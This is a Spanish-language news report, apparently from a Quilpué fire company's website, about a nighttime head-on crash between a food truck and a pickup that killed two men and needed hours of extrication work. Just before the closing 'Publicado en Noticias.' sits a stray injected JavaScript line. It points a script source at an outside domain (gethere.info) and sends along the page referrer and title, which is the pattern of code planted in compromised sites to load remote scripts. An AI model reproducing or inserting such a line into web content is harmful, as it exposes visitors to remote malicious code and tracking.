ACCIDENTE DE ALTA ENERGÍA DEJÓ 2 FALLECIDOS

Un grave accidente se registró el día viernes 29 de agosto a las 23:00 horas en el camino Lo Orozco, ruta que une las ciudades de Casa Blanca y Quilpué, en donde a la altura del kilómetro 13.380 un camión marca Volkswagen que cargaba alimentos y se dirigía a nuestra ciudad, colisionó fuertemente con una camioneta Chevrolet Luv doble cabina que transitaba en el sentido contrario. Producto del impacto frontal, dos personas de sexo masculino resultaron fallecidas en el lugar, quedando además atrapadas al interior de la camioneta, luego de que el camión prácticamente se montara sobre ella. En tanto el conductor del vehículo mayor, quien  se encontraba con un shock emocional, fue atendido por personal SAMU de Quilpué y derivado al centro asistencial.

Luego de dos horas, hasta el lugar arriba una grúa gestionada a través de la Municipalidad de Quilpué con Onemi Valparaíso, con el objeto de poder separar los vehículos y así de ésta forma, el equipo de rescatistas de la Primera Compañía comenzara las labores de descarcelación de los dos cuerpos. La labor básicamente consistió en poder retirar las puertas, retirar techo y desplazar el frontal de la camioneta, puesto que éste se encontraba sobre los malogrados jóvenes.

Recién, cerca de las tres de la madrugada, fue posible liberar a las víctimas fatales y entregadas al SML (Servicio Médico Legal). Hasta el lugar además concurrió personal de la SIAT de Valparaíso y Carabineros de la Segunda Comisaría de Quilpué para regular el tránsito de la ruta, que se encontraba habilitada con una sola vía.

 Fuente: www.primeraquilpue.cl

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Publicado en Noticias.